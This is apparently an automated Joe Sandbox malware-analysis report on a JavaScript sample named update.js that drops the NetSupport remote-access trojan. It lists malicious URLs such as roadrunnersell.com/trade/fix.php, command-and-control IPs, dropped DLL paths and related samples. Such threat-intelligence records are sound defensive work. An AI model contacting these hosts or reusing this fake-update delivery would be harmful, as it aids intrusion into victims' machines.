                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://github.com/apache/incubator-echarts/issues/11369wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://roadrunnersell.com/9wscript.exe, 00000000.00000003.1356140379.000002BB7E3D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1301369817.000002B2D2997000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pwscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1450836451.000002BB045AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1192606451.000002BB00351000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1323964009.000002B2CFBED000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.google.com/intl/en-US/chrome/blank.htmlwscript.exe, 00000000.00000003.1234026826.000002BB03AB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367815908.000002BB0934F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1492692788.000002BB03AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419923881.000002BB039EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1425244635.000002B2D3321000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://roadrunnersell.com/wscript.exe, 00000000.00000003.1353432566.000002BB08E4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356140379.000002BB7E3D2000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www-googleapis-staging.sandbox.google.comHlYwscript.exe, 00000000.00000003.1237831355.000002BB00596000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www-googleapis-staging.sandbox.google.comXwscript.exe, 00000000.00000003.1396552350.000002BB06742000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/apache/echarts/issues/14266wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.jswscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://jsperf.com/try-catch-performance-overheadwscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://jsbench.me/2vkpcekkvw/1)wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://%s/testpage.htmclient32.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://0.30000000000000004.com/wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://127.0.0.1client32.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.jswscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://momentjs.com/wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/Variable1CompositeOperatiowscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://%s/fakeurl.htmclient32.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/apache/incubator-echarts/issues/12229wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.jswscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flightwscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www-googleapis-staging.sandbox.google.com(dwscript.exe, 00000009.00000003.1439411024.000002B2CFE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://roadrunnersell.com/trade/fix.php?532dwscript.exe, 00000009.00000003.2124586436.000002B2CDE34000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdfwscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/ecomfe/zrender/blob/master/LICENSE.txtwscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www-googleapis-staging.sandbox.google.comwscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.jswscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.jswscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    5.181.159.137
                                    		unknownMoldova Republic of
                                    		39798MIVOCLOUDMDtrue
                                    79.141.163.131
                                    		roadrunnersell.comBulgaria
                                    		202015HZ-US-ASBGtrue
                                    104.26.1.231
                                    		geo.netsupportsoftware.comUnited States
                                    		13335CLOUDFLARENETUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1518513
                                    Start date and time:2024-09-25 19:01:26 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 33s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:16
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:update.js
                                    Detection:MAL
                                    Classification:mal100.rans.troj.expl.evad.winJS@8/29@2/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 55%
                                    • Number of executed functions: 116
                                    • Number of non-executed functions: 257
                                    Cookbook Comments:
                                    • Found application associated with file extension: .js

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: update.js

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    13:02:32API Interceptor44x Sleep call for process: powershell.exe modified
                                    13:03:09API Interceptor5158442x Sleep call for process: client32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    5.181.159.137Update.jsGet hashmaliciousNetSupport RATBrowse
                                    • http://5.181.159.137/fakeurl.htm
                                    104.26.1.231SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    SAPConcur.msixGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    HQuxVxuLV.ps1Get hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Advanced Scanner.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    R6aeFGF7gU.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    geo.netsupportsoftware.comqvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                    • 172.67.68.212
                                    SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                    • 172.67.68.212
                                    SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                    • 172.67.68.212
                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    MIVOCLOUDMDMRSPBASd65554AB.dll.dllGet hashmaliciousUnknownBrowse
                                    • 94.158.245.136
                                    MRSPBASd65554AB.dll.dllGet hashmaliciousUnknownBrowse
                                    • 94.158.245.136
                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                    • 5.181.159.137
                                    ZWlwrTM9HK.exeGet hashmaliciousRemcosBrowse
                                    • 5.181.156.117
                                    Gez0dmj6yl.exeGet hashmaliciousDCRatBrowse
                                    • 94.158.244.70
                                    update.jsGet hashmaliciousNetSupport RATBrowse
                                    • 5.181.159.28
                                    17E503AEF3804C0513838FB4AE3E00F323B1260BF753D99DBF0AE415BA54DE11.exeGet hashmaliciousBdaejec, RaccoonBrowse
                                    • 194.180.191.241
                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • 194.180.191.69
                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • 94.158.245.103
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 94.158.245.103
                                    HZ-US-ASBGhttps://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                    • 185.33.84.157
                                    https://chefspavilion.com/cdn-vs/original.jsGet hashmaliciousUnknownBrowse
                                    • 185.33.85.42
                                    https://chefspavilion.com/cdn-vs/original.jsGet hashmaliciousUnknownBrowse
                                    • 185.33.85.42
                                    http://www.wbdg.orgGet hashmaliciousUnknownBrowse
                                    • 185.33.85.42
                                    http://www.wbdg.orgGet hashmaliciousUnknownBrowse
                                    • 185.33.85.42
                                    https://premium.davidabostic.com/Get hashmaliciousUnknownBrowse
                                    • 185.33.84.157
                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                    • 79.141.161.172
                                    http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                    • 185.33.84.157
                                    http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                    • 185.33.84.157
                                    http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                    • 185.33.84.157
                                    CLOUDFLARENETUSinquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 188.114.96.3
                                    https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2F%63%61%73%61%64%65%72%65%73%74%61%75%72%61%63%69%6F%6E%6F%6E%6C%69%6E%65%2E%63%6F%6D%2F%68%6F%6C%79%2F%69%6E%64%65%78%73%79%6E%31%2E%68%74%6D%6C%23c2FyYWhsQGNkYXRhLmNvbQ==Get hashmaliciousUnknownBrowse
                                    • 104.21.34.147
                                    HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.51.224
                                    TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.97.3
                                    https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                    • 104.18.95.41
                                    bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.208.139
                                    LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.206.221
                                    BLHvvl44N0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                    • 172.67.206.221
                                    7Ekgc5sWNB.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.132.154
                                    HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                    • 104.21.51.224

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0eLJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                    • 79.141.163.131
                                    inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 79.141.163.131
                                    Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                    • 79.141.163.131
                                    SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 79.141.163.131
                                    SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                    • 79.141.163.131
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 79.141.163.131
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 79.141.163.131
                                    https://osoulksa.com/c/FidelitymeGet hashmaliciousHTMLPhisherBrowse
                                    • 79.141.163.131
                                    http://rkanet.comGet hashmaliciousUnknownBrowse
                                    • 79.141.163.131
                                    NTGcon.msiGet hashmaliciousUnknownBrowse
                                    • 79.141.163.131
                                    37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 79.141.163.131
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 79.141.163.131
                                    Zeskanowana lista przedmiot#U00f3w nr 84329.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 79.141.163.131
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 79.141.163.131
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 79.141.163.131
                                    SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 79.141.163.131
                                    D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 79.141.163.131
                                    cDErPwSuCB.exeGet hashmaliciousUnknownBrowse
                                    • 79.141.163.131
                                    tpq.ps1Get hashmaliciousUnknownBrowse
                                    • 79.141.163.131
                                    Kv1tZKstAC.exeGet hashmaliciousUnknownBrowse
                                    • 79.141.163.131

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLLUpdate.jsGet hashmaliciousNetSupport RATBrowse
                                      update.jsGet hashmaliciousNetSupport RATBrowse
                                        updates.jsGet hashmaliciousNetSupport RATBrowse
                                          updates.jsGet hashmaliciousNetSupport RATBrowse
                                            Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                              updates.jsGet hashmaliciousNetSupport RATBrowse
                                                Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                  Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                    MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                      update.jsGet hashmaliciousNetSupport RATBrowse
                                                        C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLLUpdate.jsGet hashmaliciousNetSupport RATBrowse
                                                          update.jsGet hashmaliciousNetSupport RATBrowse
                                                            updates.jsGet hashmaliciousNetSupport RATBrowse
                                                              updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                  updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                      Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                        MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                                          update.jsGet hashmaliciousNetSupport RATBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\loca[1].htm

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:modified
                                                                            Size (bytes):16
                                                                            Entropy (8bit):3.077819531114783
                                                                            Encrypted:false
                                                                            SSDEEP:3:llD:b
                                                                            MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                            SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                            SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                            SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:40.7357,-74.1724

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):19008
                                                                            Entropy (8bit):5.5024520238798695
                                                                            Encrypted:false
                                                                            SSDEEP:384:V8kjr8ZMuAhPJfst2UBvJ6X1qabssp2e6f05hwTwmp14toaNfbh69By:eWr0Mbv6QX1qaBAezXk1ebhz
                                                                            MD5:C0AB16AD9B9DE78D6F3C8B234A42D878
                                                                            SHA1:B6B27A86BBDD2307224C9C9B5F5A602484C994E1
                                                                            SHA-256:FB48083C23606C18C9ABC12AFDFD28BF89F4F9F04E871A0BFDDE57A73BE2A2B4
                                                                            SHA-512:ADACE36191CC92D852BE3930643373EA45C08DCA33FE03FDE9489F445910F442412E675888CC54046C0EF2C945B835436C22E925C311A657EC62BA115297C43B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:@...e..............."................................@..........H...............o..b~.D.poM...3..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....`.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhhtg4wy.qcc.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngciucte.i2j.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
